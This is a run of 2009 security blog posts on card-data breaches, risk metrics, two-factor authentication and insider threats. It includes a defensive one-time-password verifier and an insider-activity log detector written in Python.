First off, remember that now is not the time for pet projects - now is the time to get real. If you're lucky enough to work within an organization that actually understands the value of security you have a leg up on everyone else; if you don't work in one of those organizations... wait a few weeks until you're hacked and then approach the subject again. The bottom line is this - there are risks inside your company that will simply go unmitigated; you'll have to pick your battles. This is one of those rare times when security leaders with great intelligence, vision, and understanding of business shine and excel. Everyone else looks for a new job to fail at.

Part of being real is understanding that there are some immediate needs that require a security dollar, and there are some that simply don't fit on the to-do list until things calm down. I've started a list here, for your reference... please feel free to contact me or comment to add to this list.

These are some of the ways you can survive, as the security leader of your business...
  1. Forget pet projects... you won't have money, manpower, or time
  2. Focus on your business's core money-making activities, secure those as well as you can
  3. Use the shelfware you bought but haven't opened the shrink-wrap on yet
  4. Employ automation (yes, this means tools too) to make your small team as efficient and far-reaching as possible
  5. Pick your battles - understand that sometimes the answer is "We'll simply accept this risk"
  6. Review your employees; make sure you have someone that covers every necessary [read: relevant] aspect of security
  7. Look for outside help - services organizations are your friend because it means you get to spend operating budget (OpEx) and not capital budget (CapEx) - huge difference
  8. Rely on your peers for advice; there is no need to follow in their failed footsteps
  9. Trusted consultants are like gold - they're rare but can provide you with information across industries, business practices, and historical context... they may be your salvation
  10. Document mitigated risks; you'll need to make sure you document in great detail what you're doing, why, and how much it's costing... in case you ever have to explain to your board why you got hacked.
Good luck, and get yourself a life vest and a helmet... it's going to be a rough ride.

Heartland Payment Systems - Fallout Hits Alaska

It's official, the Heartland Payment Systems fallout has hit every corner of the United States (and beyond). Alaskan banks are now feeling the pinch, in what could be yet another nail in the HPS coffin. I don't like to call a ToD before the patient is cold - but this time I think it's rather obvious that HPS won't be making it through this cataclysmic event. Looking at the sheer numbers... just from Alaska:

  • Alaska USA Federal Credit Union reissued 64,000 debit cards and 6,000 credit cards to customers in Alaska and western Washington state
  • First National Bank Alaska reissued 1,150 credit cards and 7,000 debit cards
  • Credit Union 1 reissued 1,121 credit cards and 7,135 debit cards
  • Denali Alaskan Federal Credit Union reissued more than 5,000 credit and debit cards

By my count, using these rough numbers we're looking at... ~91,406 cards re-issued throughout Alaska.... so far. Let's dig deeper into the numbers... just based off this latest Alaska-based article.
  • 1 out of every 5 First National Bank Alaska customers had their card compromised - that's actually pretty high when you consider that HPS is estimating (and I'm guessing conservatively) the number of compromised accounts... because they obviously have no idea
  • The cost of re-issuing a card (at least at First National) is about $5/card
  • ~91,406 x $5 = $457,030 (by conservative extension --> 100,000,000 x $5 =
Keep in mind these numbers are a conservative estimate and many banks aren't re-issuing cards unless they actually see fraud on some major portion of that population. While that may be a high-risk activity, it is clear that the banks are taking these risks because re-issuing cards is both bad for PR, and very expensive.

So as the numbers mount, and the dollar-cost of this breach piles up - you have to wonder what, if any controls could have prevented this catastrophe? If we take it as a high-probability that this wasn't just some random virus and it was indeed targeted malware... what could being PCI compliant have done to prevent this? (the answer is likely nothing). Also... what are banks, credit agencies, card processors and other financial institutions doing now that they see the consequences of a breach staring them in the face?

I wonder. Here's something interesting...

Wells Fargo Bank, Northrim and KeyBank officials wouldn't say how many cards they've reissued due to the security breach.

Unlike other banks and credit unions in Alaska, KeyBank isn't notifying customers whose card data may have been breached unless the bank notices suspicious activity on those accounts.

Instead, "We have ramped up our fraud monitoring," said Anne Foster, a regional spokeswoman for KeyBank, which has 17 branches in Alaska.

She said KeyBank will reissue cards to customers who request it, and will immediately notify customers of any suspicious charges, but the company is trying to avoid customer anxiety and extra expense to people who haven't actually been harmed. So far, there's no evidence that KeyBank customers' card data has been used fraudulently as a result of the breach, she said.

KeyBank is the primary sponsor bank for Heartland. That means that KeyBank registers Heartland with Visa and Mastercard to provide payment processing services. Heartland must have a sponsor bank in order to do business with Visa and MasterCard.

... I wonder how long that KeyBank - Heartland Payment Systems relationship will last now that HPS is going down as the largest (and arguably most expensive) data breach to date... I wonder.

More here...http://www.adn.com/news/alaska/story/693570.html

Tuesday, February 17, 2009

FaceBook's Big Problem

FaceBook, and many other site/applications just like it, has a huge problem.

I've argued before that the enemy of security is complexity (and by extension, extensibility)... so it should be no surprise that FaceBook's biggest problem now is the countless plug-in applications that live in its ecosystem. Plug-in applications (or applets) that rely on the FaceBook API to do simple things like keep state, or interact with Beacon for the average user are indistinguishable from the main FaceBook application... and that's a problem as well.

While the FaceBook.com staff may be doing a relatively good job of keeping their code bug and exploit-free, the same cannot be said for the countless applications that plug into the FaceBook framework. These applications, after all, have their own databases, data source/sinks, and control paths independent of FaceBook, but in the final result cannot stand alone. A recent post to my blog and another blog about a "SQL Injection attack on FaceBook" is not actually an attack against FaceBook at all, but simply against an application off-shoot from the FaceBook.com framework... and while that application is full of SQL Injection goodness [or badness, you decide] this does not necessarily reflect on FaceBook.com itself... or does it?

The issue of extensibility of an application is one of function vs. security... and is an age-old battle. On one hand, FaceBook (and others like it) have the need to extend themselves beyond their own means to incorporate community add-ons that make their platform more attractive. On the other, they realize that by doing this they are stripping the very security features which they depend upon right off... Transferring control to a 3rd party application within the framework of your own application is a scary thing. The delicate balance between extensibility and security is like the dance of death between the cobra and the mongoose... Each, on its own merits, is more important - but when juxtaposed they are like a collision between the unstoppable force and the immovable object - something has to give. [OK, I swear I'm done with metaphors]

The $1Bn question is, where does extensibility bleed out into security hazard and what formula would one use to strike the appropriate balance. While I may not have the exact formula [yet], I would like to offer the following components...

Risk = 1 / (Value[e] - Hazard[e] ) {value != hazard, value > hazard} as {Risk --> 0}

Think of extensibility of a framework/API such as FaceBook as a component of both value & hazard at the same time, because extensibility adds to FaceBook's overall value, but it also increases the hazard. Interesting, right?

Best. Hack. Ever.

In what is perhaps the best, and most creative, "hack" ever, someone managed to hack into the drive-through radio system at a Taco Bell in Sedalia, MO... and berate drive-up customers.

"Quite a few Taco Bell customers probably wanted to run away from the border this week!

Someone hacked into a Taco Bell drive-through radio system in Sedalia, Mo. and then shouted obscenities at consumers, ABC15.com reported.

ABC15.com also reported:

Authorities are speculating that for the hackers to have interfered with the radio frequency, they must have been nearby the Taco Bell.

Taco Bell employees plan to press charges if the pranksters are found."[SRC: NY Daily News]

Monday, February 16, 2009

Wyndham Hotels Victim of Hackers

It's just February 16th, but already the data breaches from this year have reached epic proportions. We've already had a for-the-record-books data breach in Heartland Payment Systems which is being class-action sued [thrice!], and by one of the legal firms [ Berger & Montague ] which beat up on TJX in court (awesome, go get 'em!). Now, Wyndham Hotels has announced that anyone who's stayed at one of their hotels should be checking their credit card statements... really? How many credit monitoring offers can one person handle? I know I've personally gotten 5 (at least, I lost track) in the past year...

Let's take a step back, just for a second. At what point do all these data breaches drop into the background noise of the news? I am rather excited that this type of news still makes the front pages but at some point it's going to start becoming "yet another data breach story"? Or am I wrong?

All these companies should be ashamed of themselves, from a PR perspective at least, but there are consequences, aren't there? We, the consumers, keep hearing the "check your credit statement" line so often ... I don't know about you but I already look at my credit card statement online daily - it's just something I've learned to live with. I'm afraid the news will eventually (in the near future) lose its sting.

What do you think?

200 - w(_)w

Hey Readers... I firmly believe that a person is only as relevant as the company they keep and as I type out my 200th post here on PreachSecurity, I'd like to say thank you, to all of you, the readers.

Over the past year+ you've made this blog an adventure, and with your comments and suggestions it's gotten to a respectable level of readership... and with the honest and constructive feedback I'd like to think I've achieved something here.

Now- I need your help, and want feedback again. I'd love to hear what you want to read about, over the next year or so. Is there a favorite topic you read on here? Do you have a favorite rant, or commentary you'd like me to expand on?

Here's your chance ... let's hear what you've got to say!

If it holds true that a man is only as relevant as the company he keeps - then I feel great knowing I've got some very active readers, thinkers, and colleagues. See you soon!

HSN: Simple Shopping? or Security Hole?

... a quick comment on something that troubles me.

I ordered something on Home Shopping Network (don't ask...) and when the operator was done taking my order she said something that intrigued me.
"Next time, sir, all you have to do to place an order using our automated system is give your phone number."

Wait, all I have to do is call their phone system, give a phone number and order something? Now, I'm tempted to try and call, and order something for someone else. Who has an HSN account they're willing to try this with? {evil grin}

Friday, February 13, 2009

Identity Theft: Victimizing the Dead

Dead people, I've learned, make great identity theft victims.

Around November 2007 or so I did some investigative work with a colleague of mine at a place here in Chicago that is essentially a chop-shop for cadavers. Without naming the place, I can tell you that if you ever donate your body to science, and you happen to live in this area... this is where you'll be going.

Anyway, the body parts all over the place wasn't the problem... the information theft was. Apparently someone had broken in and taken some records, digitally of course, from a database that housed everything from your social security number, to your next of kin, your medical history (obviously relevant), your drivers license number, home address... you get the picture. The point is that this database was inside a home-grown application, on MS-Access, and pretty much open to the world. Forensics on this box were going to be nearly impossible given the Windows version, and extremely open nature of the box...

So after determining there was nearly nothing we could do to identify the attacker (or thief) we nuked the box, and built a new one which had some security controls, a firewall, etc... but that got me thinking.

Dead people really would make the best identity theft victims, assuming you can get past the "hey, you're listed as dead according to your credit agency report" part. Given that things are a little chaotic in the credit industry... I wonder how much of this is going around? Furthermore, with the amount of chaos inside the organization (not-for-profit) one can only wonder how many more of these there are around the country and what information they're bleeding (no pun intended)...

Wednesday, February 11, 2009

Risk: The Ultimate Metric

Many years ago, back when the world was young and IT was innocently going about troubleshooting DOS 3.3 machines and setting up those brand-new 300b modem banks, risk meant something entirely different than it does today. Back then, risk was an entirely business-owned term. Risk dealt with one of the following, and only under rare cases was it anything more:
  1. Financial: related to credit or investments such as loans, credit cards, or other financial obligations
  2. Legal: dealing primarily with breaking the law, whether local, federal, or international
  3. Human: accounting for the human element of a corporation, mainly HR-related
  4. Opportunity: taking a risk or pursuing an opportunity which could positively or negatively impact the business
Now in 2009, we look at risk as a metric applied to technology. While there are actuarial models for quantifying the 4 previously-mentioned risk types we are still falling short at being able to measure technology-based risk. This can be understood largely by the historical view of things, given that the 4 other types of risks identified here have been around for centuries and are reasonably well-understood and refined through the ages, whereas technology-based risk has been measured for somewhere less than 20 years. This makes it pretty easy to understand why your auto insurance company can tell you what risk profile you fall into after asking you just a few simple questions and what your loss-expectancy is; and you still have no idea how to tell your upper-management what the likelihood of getting hacked is if {insert security counter-measure here} gets implemented.

Risk is truly the ultimate metric for security practitioners and managers alike. We've tried to model risk with equations, formulas, and frameworks over the past half-decade or so but we're still failing to fundamentally provide consistent answers to the same question.
"How much less likely are we to be hacked if we spend $X dollars on Y solution?"
Your insurance company can tell you how much less likely you are to cost them money if you're a married male over the age of 25, versus an unmarried male under 25... but we in security have no such magic table of risk to speak from.

As I've stated, I know full-well there are some great risk model frameworks and formulas out there but at the end of the day... I don't know a single one that can answer the question, posed above. Is it because every business is different? Maybe it's because there are more factors than we can possibly factor into a cohesive formula and keep sanity... or maybe it's just that we simply don't understand risk in technology terms completely.

Take a look at your 2009 projects (if you have any, given the economic climate) and ask yourself... which of these reduces the business' risk profile the greatest, and by how much? I urge you to abandon trying to word-smith your projects into something your CIO will find acceptable (or at least scary) and focus on trying to come up with that all-important metric... risk. Instead of justifying your pet project by saying it will keep your company from making negative front-page news or losing millions of credit card records... Justify that project by saying that implementation of that project will decrease negative business risk by 20% (or whatever your number is)... and watch the reaction.

... now all you have to do is figure out that magic formula. Good luck.

Tuesday, February 10, 2009

Hacker Losses for 2008 at $1Trillion

... and 2009 is just getting warmed up...it's only the second week of February!

According to this story on the front page of Yahoo! today, $1 Trillion dollars worth of data loss was perpetrated in 2008. That is more than the current spending bill...erm, "stimulus bill" being proposed by Pres. Obama. That kind of money is staggering... and now it's making the front pages.

A quick recap of the two biggest events so far shows that Heartland Payment Systems (HPS) and SRA International have both lost staggering amounts of cardholder records and will in all likelihood be forced out of business due to losses, law suits, and fines. There seem to be more hacks every day that continue to pile up, and the numbers seem to pile up faster as the world economic condition struggles to stave off global depression. Obviously organized crime has found a way to thrive in these dark times; so remember that your employees are even more vulnerable to organized crime "temptations" for insider crime.

The atrocities at SRA and HPS, if you analyze them rationally, could not have been perpetrated by a "virus"; but are most likely the victims of custom-created malware which was seeded by an insider. As things get worse the insiders, those employees terrified about losing their jobs - will be your greatest enemies.

Think carefully before cutting those security dollars and spend on security programs, lest your business be the next victim in the $1 Trillion+ loss-pile for 2009.

Yemen Releases 170 Al-Qaeda Suspects

The headline reads "170 Al Qaeda Suspects Released in Yemen" which isn't a real shock when you consider that Al Qaeda has announced that it has made Yemen its Middle East base of operations... and the central government has very little control of the actual country.

What really drew my ire and utter shock was this snip...
"The men were freed Friday and Saturday after signing pledges not to engage in terrorism — a strategy the Yemeni government has often used with those suspected of fighting in militant causes abroad. Local tribal leaders are also expected to guarantee the good behavior of the released."

... which I found to be absolutely ridiculous. Suspected terrorists were released because they signed a paper that says they won't do bad things like kill people?

That didn't even work for me back in grade school, and I was only in trouble for talking in class! These animals are suspected terrorists, which I admit has the word "suspect" in it... but unless Yemen is in the business of arresting random people, I figure it has some truth to it.

Shame upon the house of the idiot(s) who thought this one up.

Monday, February 9, 2009

Parking Meter Fail?

Spotted during this past year's CSI Conference in National Harbor, MD...


Titled: Parking Meter Fail

(2FA) Strong Authentication ... and open source

As many of you readers know, I've always been an advocate of "more-than-a-simple-password" authentication, so when I had the opportunity to speak with Nick Owen from WiKID Systems I took it. Nick had some interesting things to say about his company's market-space, and the need for stronger authentication, so here are some highlights from that interview.

First, here's Nick's take on his company's background and market-purpose.
Nick: "We provide strong authentication solutions. We support an open source and an enterprise version. We're really the only open source solution with a company standing behind it. That allows us to leverage the open source world but also provide a strong, supported product at a reasonable price and since authentication is so "inline" it's important to have it supported."
Immediately, I wanted to know why Nick thought that 2FA (2-Factor Authentication) hasn't been more widely implemented. I've always thought that strong (2FA) authentication should be the baseline for any well-protected online system... Nick's thoughts were pretty much in-line with what I was thinking... Nick highlighted the two main points that have plagued 2FA (and strong authentication in general) for the last several years - namely cost and complexity. While hardware tokens are still expensive and not practical overall, token-based authentication still falls victim to MITM (Man-in-the-Middle) attacks and complexity makes it hard for every online shop to adopt this strategy.
As the conversation turned towards making 2FA more mainstream we seemed to agree that (as his PC token demonstrates) mutual HTTPS authentication is good for network security and applications such as mutual-verification and VPN solutions, but this approach doesn't solve every need universally - which is a problem in itself.
There are other issues with 2FA and "tokens" in general... for example, as Nick explains, malware and stolen credentials:
Nick: "Malware is a concern - but if you look at what is actually happening, it is a combo. Take the checkfree breach: the attackers (we think) stole the username and password for Checkfree's Network Solutions account and created a MITM attack redirecting users to a site that installed malware. If Network Solutions used 2FA, it wouldn't have happened. If Checkfree used mutual https authentication it also wouldn't have happened! So, it gets down to doing something - which is better than nothing - and defense in depth."
So where does the line of responsibility for the security/privacy of a transaction lie? How much do we trust the end-user's browser when we're dealing with web applications? This is one of those tough questions I like to hear people's answers to... and Nick's insight was interesting.
Nick: "Well, not at all - OK, that's not really true. Perhaps trust is the wrong word because it has morally right or wrong, black/white connotations. Really, it's more about risk acceptance: "I'll take a risk that there is no man-in-the-browser for now, but once that risk increases past X, I need to do out-of-band transaction authentication. In terms of "responsibility", I think a lot of that is regulated for many financial institutions and to a less extent driven by the market."
That's so true - risk is at the base for every decision especially about stronger authentication. But at what point does the risk equation turn the strong authentication issue from a "nice to have" into a "must have"? There aren't any easy answers...
Nick: "Notoriously tough question! I think certain sectors will have that soon. Why doesn't Network Solutions use two-factor authentication already? I would think that Checkfree would gladly pay for it. I think the gamers will see it soon too, such as online poker, etc."
Taking it as a given that people won't want to carry around a token for each merchant they want to have strong authentication to, there has to be a better solution, right? What about a single-broker solution that could be federated out to many different customers such that one token in your hand could get you access to many of the systems you use today including your bank, favorite merchant( and yes... even online poker)?

Nick: "Well, WiKID is well designed for that. We have a customer - Online Banking Solutions - that runs WiKID in a "cloud" (what used to be "service bureau" then "ASP" :). Each bank is a network client to their WiKID server and can add/manage users, get reports, etc. without impacting the other network clients."
That's brilliant. So this one-token approach should be used everywhere, right? It's cost-effective, scalable, and open-source... so why isn't everyone on this bus? Maybe not enough companies have heard of WiKID?

As a final thought, I asked Nick his thoughts on "user-friendly security" and how his products and services conform to the stupid-user usability curve... meaning, are they user-friendly enough to be used by Joe Average user...
Nick: "I think so. For example, our PC token automatically copies the OTP to the clipboard and if mutual HTTPS is set up, then the default browser is launched by the token to the validated site. We also can handle multiple domains - so one token can work with many sites and each user can have more than one token - so one on their BB and one on the laptop, etc. In general, people like using a cellphone more than carrying hardware."
I'd like to thank Nick Owen of WiKID Systems for taking the time to chat, and field my questions on the topic of 2FA or strong authentication. This is a very necessary piece of technology that must not only be simple to use, but adoptable practically... I think WiKID does this smashingly well.
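An added example, not WiKID's code or anything from the interview (WiKID uses its own token design; the server class here is assumed for illustration): an RFC 4226 HOTP verifier, showing what a one-time password buys you (a captured code cannot be replayed) and, in the comments, what it does not (a real-time relay still works), which is the MITM point raised above.

```python
"""HOTP (RFC 4226) generation and server-side verification.

Added example; not WiKID's method. The OtpServer class is an assumed,
minimal record of one enrolled token: shared secret plus the next
counter the server expects.
"""
import hashlib
import hmac
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """Compute the RFC 4226 HOTP value for a shared secret and event counter."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation offset
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


class OtpServer:
    """Server-side state for one token: secret and the next expected counter."""

    def __init__(self, secret: bytes, look_ahead: int = 5):
        self.secret = secret
        self.counter = 0            # next counter value the server will accept
        self.look_ahead = look_ahead

    def verify(self, submitted: str) -> bool:
        """Accept `submitted` if it matches one of the next `look_ahead` counters.

        The counter only moves forward, so a code that was already used (or
        sniffed and replayed later) is rejected. A token pressed a few times
        without a login (counter drift) is resynchronised automatically.

        Limitation (the MITM point from the interview): this check cannot tell
        whether the code arrived from the user or from a proxy relaying it in
        real time; that is what mutual HTTPS / site verification is for.
        """
        for c in range(self.counter, self.counter + self.look_ahead):
            if hmac.compare_digest(hotp(self.secret, c), submitted):
                self.counter = c + 1
                return True
        return False


if __name__ == "__main__":
    # RFC 4226 Appendix D test secret; codes for counters 0..9 are published there.
    secret = b"12345678901234567890"
    server = OtpServer(secret)
    print(hotp(secret, 0))                    # 755224
    print(server.verify(hotp(secret, 0)))     # True  (first use)
    print(server.verify(hotp(secret, 0)))     # False (replay rejected)
    print(server.verify(hotp(secret, 3)))     # True  (drift within look-ahead)
```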

Saturday, February 7, 2009

Your GPS is evil

Everyone has a GPS in their vehicle these days.  I bet you've even programmed your house into the home button, right?  I'd like to tell you that's a really bad idea.  Why, you wonder?  Consider this.
As your car is parked in the garage at the office, someone breaks your window and swipes your GPS.  They also swipe your garage door opener.  They then drive to your house (thanks to the help of your GPS) and open your garage while you're at work.  They can then help themselves to whatever you own, and leave without arousing suspicion.
So what should you do, you're probably asking yourself.  I suggest going to the nearest gas station from your home, a fast-food restaurant, or some other place far enough from your home, but one you know your way home from, and set that as your home.  This measure, although simple, will keep some thief from possibly being led straight to your home.

Stay safe!

Friday, February 6, 2009

People Hacking 101: How to Infiltrate a Credit Agency

The economic situation is getting worse.  Layoffs are pervasive in every industry, and it's global.

It gets worse.  Since there is very little chance for pay raises or employee "happiness" spending, things are starting to look grim, and this is driving higher insider crime - but maybe not in the sense that immediately comes to mind.

A peek into the distressed employee's mind can show a battle royale of opposing forces; one side is upset and wants to set fire to the place, the other is happy to have a job.  Enter into this situation the dire economic need more and more employees find themselves in and you begin to see an ethical situation teetering on the brink.

All that's needed now is a slight nudge in one direction or the other.  The following scenario is real... played itself out in real-life about 3 years ago... when things were still half-way decent.
After a 3rd round of layoffs from the Acme Credit Card Company employee morale was down, and everyone was worried about losing the job next.  The call center employees knew that at any given point they could be next, and with the local economy faring poorly, everyone was in a state of panic.
One evening on the way to her car a female call center employee was approached with an offer.  For $1,000 and dinner she would need to answer some questions about the Acme Credit Card Company's internal call center procedures.  The inquisitor was clearly after some security knowledge that only an insider could give... but the employee, seizing the opportunity for a quick grand, obliged.  The following week the same employee was approached in the parking lot again with a USB memory stick, and an envelope.  The envelope contained simple instructions, and $3,000 cash with the promise of a higher payout on completion of the task.
Over the next 2 weeks the employee followed directions and plugged in the USB stick and ran a simple application while she worked during the day, then unplugged it and slipped it into her shirt on the way out the door so no one would suspect anything.  After 2 weeks, she was approached again, in the parking lot, with another envelope and an outstretched hand for the memory stick.  The envelope had another $6,000 in it, bringing the total to $10,000 for 2 weeks of simple covert operation.
The employee never heard from or saw that person again...
Now - ask yourself what protections your company has against this situation.  What types of protections will the antivirus, the IDS, the DLP appliances, and all the other "boxes" on your network afford you?

This turned out to be a data breach that saw nearly 100,000 cardholder records compromised, including online logins, passwords, credit card numbers, mother's maiden name... you name it.  The total cost was estimated somewhere around $14MM including cleanup, fraud, and other associated costs.

This will become more prevalent as the economic climate deteriorates, and organized crime begins to step in even harder.

There are measures which can protect against this type of situation, and rarely do the countermeasures require serious purchases...
  • First and foremost identify where critical information (such as cardholder data, etc) lives in your network and systems
  • Lock down critical information on a need-to-know basis, masking non-necessary bits
  • Establish role-based access controls and procedures (monitor they are enforced)
  • Create an oversight/audit group which can operate independently of IT, reporting to either Legal Counsel, or Risk... audit internal procedures and their effectiveness regularly
  • Establish behavioral-baselines for your employees; profile what groups of people do what and then create red flags when there are deviations
  • Lock down workstations, remove the user's ability to add hardware/software to your pre-built, locked-down image
  • Create a zero-in/zero-out policy; establish checkpoints at the entrance to call centers and critical data silos... create a policy that allows for nothing to be brought in, or removed without specific authorization
  • Perform extensive background checks tiered appropriately to the level of access an employee has
  • Make these policies public and post consequences...
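An added example, not from the post, that puts two of the bullets above into code: a per-role behavioral baseline with red flags on deviations, and treating any removable-media event on a locked-down workstation as a flag. The log format, field names and numbers are constructed for the example.

```python
"""Behavioral-baseline red flags over constructed call-centre activity logs.

Added example. One constructed line per user per day records how many
cardholder records the user viewed and how many removable-media (USB)
events the locked-down workstation reported.
"""
import re
import statistics
from collections import defaultdict

# Constructed sample log (not real data). The last line is the anomaly.
SAMPLE_LOG = """\
2009-01-26 user=alice role=callcenter records_viewed=41 usb_events=0
2009-01-26 user=bob role=callcenter records_viewed=38 usb_events=0
2009-01-26 user=carol role=callcenter records_viewed=45 usb_events=0
2009-01-27 user=alice role=callcenter records_viewed=39 usb_events=0
2009-01-27 user=bob role=callcenter records_viewed=44 usb_events=0
2009-01-27 user=carol role=callcenter records_viewed=40 usb_events=0
2009-01-28 user=alice role=callcenter records_viewed=43 usb_events=0
2009-01-28 user=bob role=callcenter records_viewed=37 usb_events=0
2009-01-28 user=carol role=callcenter records_viewed=42 usb_events=0
2009-02-02 user=alice role=callcenter records_viewed=40 usb_events=0
2009-02-02 user=bob role=callcenter records_viewed=44 usb_events=0
2009-02-02 user=carol role=callcenter records_viewed=910 usb_events=1
"""

LINE_RE = re.compile(
    r"^(?P<day>\d{4}-\d{2}-\d{2}) user=(?P<user>\S+) role=(?P<role>\S+) "
    r"records_viewed=(?P<views>\d+) usb_events=(?P<usb>\d+)$"
)


def parse_log(text):
    """Parse the constructed log into dicts; lines that don't match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["views"] = int(d["views"])
            d["usb"] = int(d["usb"])
            events.append(d)
    return events


def role_baselines(events, before_day):
    """Mean and population stdev of daily record views per role, using only
    days strictly before `before_day` (the learning window)."""
    per_role = defaultdict(list)
    for e in events:
        if e["day"] < before_day:          # ISO dates compare correctly as strings
            per_role[e["role"]].append(e["views"])
    return {role: (statistics.mean(v), statistics.pstdev(v))
            for role, v in per_role.items() if len(v) >= 2}


def red_flags(events, baseline_end, sigma=3.0):
    """Return (day, user, reason) tuples for activity on/after `baseline_end`
    that deviates from the role baseline or involves removable media."""
    base = role_baselines(events, baseline_end)
    flags = []
    for e in events:
        if e["day"] < baseline_end:
            continue
        mean, sd = base.get(e["role"], (None, None))
        # Floor the stdev at 1 so a very uniform role doesn't flag on noise.
        if mean is not None and e["views"] > mean + sigma * max(sd, 1.0):
            flags.append((e["day"], e["user"],
                          f"records_viewed={e['views']} vs role baseline "
                          f"{mean:.0f} +/- {sd:.1f}"))
        if e["usb"] > 0:
            flags.append((e["day"], e["user"],
                          f"removable media on locked-down host ({e['usb']} event)"))
    return flags


if __name__ == "__main__":
    for day, user, why in red_flags(parse_log(SAMPLE_LOG), "2009-02-01"):
        print(day, user, why)
```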
With a little bit of hard work, your company can survive the onslaught of organized crime, and rogue employees.  What measures do you have that would protect you in this very real situation?  I'd love to hear your answers either publicly or privately.

Thursday, February 5, 2009

When Going Gets Tough - Bad Guys Get Creative

"Necessity is the mother of invention" is one of my favorite quotes.

When things get tough, as in our current economic situation, people find creative ways to get by. Often that means turning to crime, and becoming creative. This was clearly the case when a fake parking ticket scam was used to direct people to a website that installed a fake IE BHO (Browser Helper Object), which then tried to get you to install fake anti-virus software, as has been the case in many instances before.

The goal, as always, is to make money on you. P.T. Barnum said it, "There's a sucker born every minute"... and these people capitalize on that. Don't be a sucker.

FaceBook Vulnerable to SQL Injection?

[ Source: http://hackersblog.org/2009/02/04/facebook-hacked-o-baza-de-date-cu-milioane-de-conturi-ce-pot-fi-accesate-de-oricine/ ]

This just in, FaceBook is vulnerable to SQL Injection... well, not exactly. FaceBook apps are vulnerable to SQL Injection based on the posting on the HackersBlog website. Interestingly enough the screen shots provided are not really of the base FaceBook application, but rather the add-ons that people can code into this application.

So the question is... did someone ("unu") find a bunch of holes in poorly-written FaceBook applications, and if so... does that expose the rest of the FaceBook application to SQL Injection?

Stay tuned.

Wednesday, February 4, 2009

SRA Data Breach Analysis

If you've read your breach notification lately, SRA International announced it suffered a data breach.

{ Links }
Read carefully, there is a consistent theme in every one of those links... "SRA recently discovered a virus... that was not detected by its antivirus"... let's focus on that for a minute. While Mr. Ralph DeFrangesco of ITBusinessEdge seems to surmise that SRA Intl's antivirus systems were simply out-of-date, I will offer an alternative albeit more sinister explanation. My explanation requires a dig back into the news releases from Heartland Payment Systems (HPS) and the hoopla surrounding that incident. Both of these, if read carefully, point to a piece of malware that infiltrated otherwise healthy, reasonably-well maintained networks. Now, while I've been known to poke the occasional fun at "compliant" companies which suddenly become compromised I'd like to take a step back and address this from a slightly more sinister angle as I said before.

What-if... just what-if these "malware/viruses" which were placed inside these companies weren't run-of-the-mill worms/malware/viruses? What if, and this sounds more logical, these were custom-created malware with the intended purpose of infiltrating these companies and executing data breaches? Doesn't that sound more logical, given all we know, Mr. DeFrangesco? Doesn't that more easily explain how these malware could have slipped past antivirus systems? When's the last time your anti-virus caught an "0day" exploit? I'm going to guess never... and I'll stake my hard-earned reputation on that.

What we have here, folks, is a case of bad economic times breeding ugly things. These companies could have been compliant with everything known to man, had up-to-date anti-virus software on all desktops, servers and network wires and they still would have succumbed to these pieces of malware. Why? Antivirus is fundamentally flawed, period. Being able to stop an attacker only after they've been identified is nearly useless.

What I suspect is going on here, and will be happening more and more in the coming year - is that someone was commissioned to write a piece of malware which would attack a vector specific to HPS, or SRA... exploit the system and collect the data the attacker wanted. This malware would be largely undetected (as there are no signatures for custom malware), and would only be caught under extraordinary circumstances, or with dumb luck.

So you see... HPS, SRA, and the soon-to-be countless others are going to fall victim like dominoes, one right after the other and there is [almost] nothing any of them can do about it. The only effective measures against hard times and organized crime (which is what I surmise these cases clearly reek of) are a good, effectively implemented least-privilege policy, well-educated staff, and risk-based mitigation.

You heard it here first... this is just the beginning.

Commentary on social media vs privacy

It seems that you can't get away from social media lately. Twitter, FaceBook, LinkedIn, Dopplr... and those are just the ones you'll find me on.

While MySpace (which is currently the reigning king of social media geared towards children, and those who would prey upon them) recently kicked off 90,000 sexual offenders I'm left pondering the pervasiveness of social media on our lives and the impact that has on our culture.

The first thing that springs to mind is privacy, or lack thereof. As we post our whereabouts on twitter, FaceBook, and other locations we start to whittle away our own privacy yet we complain about the measures our government takes to keep track of us on the expressways (as an example). It seems that it's OK when we give up our privacy ourselves, but when someone else takes it away that's not OK... I guess I can see that.

To take this a step further, have you ever Google'd yourself? How much information can someone find out about you online via a simple search? Would a thief know when to show up at your home and rob you blind? Could someone guess a password of yours simply by keeping track of your interests online? Think about it.

The next time you go and post your status to Twitter, FaceBook, or MySpace... make sure you know what you're getting into. There is a price to pay for social connectivity - and that price is privacy.

Tuesday, February 3, 2009

RBS WorldPay Fallout - FBI Uncovers Coordinated ATM Fraud

02/05/2009 | Update

  Don't you just love mug shots?  Since this has been all over the news, it may be interesting to hear and read that there is now a full-scale manhunt on for these folks (who are guaranteed to be low-level "cashers"), in order to flip them on their bosses.  Hopefully this is tracked by the FBI to its end.

---

[ Source: http://www.foxnews.com/story/0,2933,487184,00.html ]

If you're still skeptical about the impact that the poor economy is having on fraud and hacking, read this news story off the Fox News wire. The FBI has uncovered a $9M world-wide coordinated ATM withdrawal...
"In a matter of hours, thieves struck ATMs from 49 different cities — including New York, Atlanta, Chicago, Moscow and Montreal — just after 8 p.m. EST on Nov. 8, according to the FBI."
While this is certainly not the first time stolen records (this time from RBS WorldPay) were used in ATM fraud which resulted in real dollar-losses, this is one of the biggest. What's even of higher note is that this happened in an extremely well-coordinated fashion, as the quote above shows. Hacking isn't just about bored high-school kids anymore - it's about organized crime syndicates, making real multi-million dollar hack-and-fraud schemes a nightmarish reality for banks. All the compliance in the world won't protect you if you've done nothing to fix security issues at these banks, card issuers, and card processors (like Heartland Payment Systems).

For a while now we've been discussing how big the potential fraud will be from the HPS ~100MM record heist... and if we extrapolate out from the RBS WorldPay attack (which was 1.5MM records), the incidence of fraud from the Heartland Payment Systems hack will be catastrophic.

This should be yet another wake-up call for banks, processors, and card institutions... FIX YOUR SECURITY else face the wrath of fraudsters (and extremely upset end-users).

Monday, February 2, 2009

Comcast Hacked - 30-seconds of porn during SuperBowl!

[Source: http://www.tmcnet.com/usubmit/-tucson-comcast-we-wuz-hacked-cable-provider-apologizes-/2009/02/02/3958118.htm]

